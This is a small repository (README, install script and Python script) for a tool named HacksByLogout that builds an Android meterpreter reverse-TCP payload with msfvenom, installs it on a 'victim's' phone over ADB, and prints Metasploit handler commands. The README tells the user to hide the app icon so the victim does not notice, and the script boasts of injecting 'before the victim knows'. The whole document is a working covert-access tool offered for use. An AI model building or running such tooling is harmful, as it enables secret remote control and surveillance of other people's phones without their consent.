├── README.md ├── install.sh └── payloadinjector.py /README.md: -------------------------------------------------------------------------------- 1 | # HacksByLogout 2 | Its a automatic PAYLOAD injector tools for kali linux powered by LogOut AKA Ethical Hacker. 3 | ##First of all make install of all the files required during this process . you can directly do it by installation script i.e. install.sh on the main folder. 4 | Run ./install.sh 5 | OR 6 | install the following packages 7 | 1. metasploit-framework 8 | 2. Android Debug Bridge(ADB) 9 | 3. Fastboot 10 | 4. colorama for python 11 | 5. Python3 12 | 13 | Be sure to setup or place the HacksByLogout folder on root directory of system and not to touch or edit any files or it may cause you to stop working. 14 | Steps You need to follow!!!! 15 | (1) Just enter your IP of device. Note: you can check your ip using ifconfig command in terminal. 16 | (2) Enter the port : 17 | Note: I usually recommend using 8080, 4444, 5555 or any 4 digit number as a port since it is very necessary, you need to use the port . 18 | (3) turn on usb debugging on your device and plug it for 10 seconds. Time depend upon your internet connection and system power. 19 | (4) After the injection , it will automatic open msf console so that it will be easy for you. 20 | (5) type the commands given to you on opened terminal. 21 | 22 | After exploit just tap or launch the installed PAYLOAD for single time and you will be connected. 23 | MAKING PAYLOAD SECURE!!! 24 | after connection just type the following command and hit enter. 25 | hide_app_icon 26 | this let you to hide your PAYLOAD and make it undetectable by user. 27 | use help command to list the things you can do. Copyright@HacksByLogOut 28 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | apt-get install metasploit-framework 2 | apt-get install python3 3 | pip install colorama 4 | apt-get install adb && apt-get install fastboot 5 | apt-get update && apt-get upgrade 6 | apt-get autoremove 7 | -------------------------------------------------------------------------------- /payloadinjector.py: -------------------------------------------------------------------------------- 1 | ###For importing modules 2 | import os 3 | import sys 4 | import time as t 5 | from colorama import Fore,Style 6 | 7 | os.system('clear') 8 | ##FOrLogo 9 | print(Fore.RED + "\n\t\t\t\t PAYLOAD INJECTOR by LogOut!!!") 10 | print("\n\t\t Inject the payload in one click before the victim knows.") 11 | print("\n\t\t\t\t PAYLOAD FOR METASPLOIT-FRAMEWORK!!") 12 | 13 | print("\n\n\n MAKE SURE TO PLACE HacksByLogOut FOLDER TO PLACE ON ROOT DIRECTORY! else errors may occour" + Style.RESET_ALL) 14 | ##for inputs 15 | own_ip = input("\n Enter Your Host IP address : ") 16 | own_port = input("\n Enter a PORT : ") 17 | t.sleep(1) 18 | print("\n\t\t We are analysing the given Ip and PORT!! wait for few seconds") 19 | t.sleep(3) 20 | if own_ip == '' or own_port == '' : 21 | print("\n\t\t\t\t IP or PORT can't be empty!") 22 | 23 | else: 24 | print("\n\t\t\t\t Creating a payload !!") 25 | print(Fore.RED + "\n\t This might take some time depending upon your system and Internet! Be Patient!") 26 | t.sleep(2) 27 | 28 | ## creating a payload 29 | 30 | os.system('msfvenom -p android/meterpreter/reverse_tcp LHOST=' + own_ip + ' LPORT=' + own_port + ' R> /root/HacksByLogOut/android.apk') 31 | 32 | 33 | t.sleep(2) 34 | print(Style.RESET_ALL + "\n\t\t Payload created. Time to inject it in Victim's device! Whooo Whooo") 35 | t.sleep(2) 36 | 37 | print("\n Connect victims phone with usb and turn on usb debugging. This injection takes a few seconds only!!") 38 | print( Fore.RED + "\n\t\t\t Allow all the prompts in Android Phone!!! ") 39 | t.sleep(10) 40 | print("\n\t\t\t\t Setting Up Device Installation!!" + Style.RESET_ALL) 41 | t.sleep(1) 42 | os.system('adb devices') 43 | 44 | t.sleep(5) 45 | 46 | os.system('adb install /root/HacksByLogOut/android.apk') 47 | 48 | t.sleep(2) 49 | print("\n\n\t\t\t\t PAYLOAD INJECTION SUCESSFUL! ") 50 | t.sleep(1) 51 | print(Fore.RED + "\n\n The device can be removed from the system! You can see MainActivity on apps drawer. this is the injected payload." + Style.RESET_ALL) 52 | 53 | print("\n\n\t\t\t\t Opening MSFCONSOLE *!*!*!*!") 54 | t.sleep(3) 55 | os.system('gnome-terminal -e msfconsole') 56 | 57 | t.sleep(5) 58 | print("\n\n\n\n\n\t Now type the following command step by step in msfconsole open on another terminal") 59 | t.sleep(2) 60 | print(Fore.WHITE + "\n\n\n 1> use exploit/multi/handler") 61 | print("\n 2> set payload android/meterpreter/reveres_tcp") 62 | print("\n 3> set LHOST " + own_ip) 63 | print("\n 4> set LPORT " + own_port) 64 | print("\n 5> exploit" + Style.RESET_ALL) 65 | 66 | t.sleep(2) 67 | print(Fore.RED + "\n Be sure to be connected on same Wi-FI !!") 68 | t.sleep(5) 69 | print("\n\n Now lauch the MainActivity on phone for one time and you will be connected to victims phone!!") 70 | print("\n use help command to see sorts of things you can do !!" + Style.RESET_ALL) 71 | 72 | 73 | t.sleep(2) 74 | print(Fore.MAGENTA + "\n\n\n\t\t\t HAPPY HACKING TO ALL OF YOU FROM LOGOUT!!" + Style.RESET_ALL) 75 | --------------------------------------------------------------------------------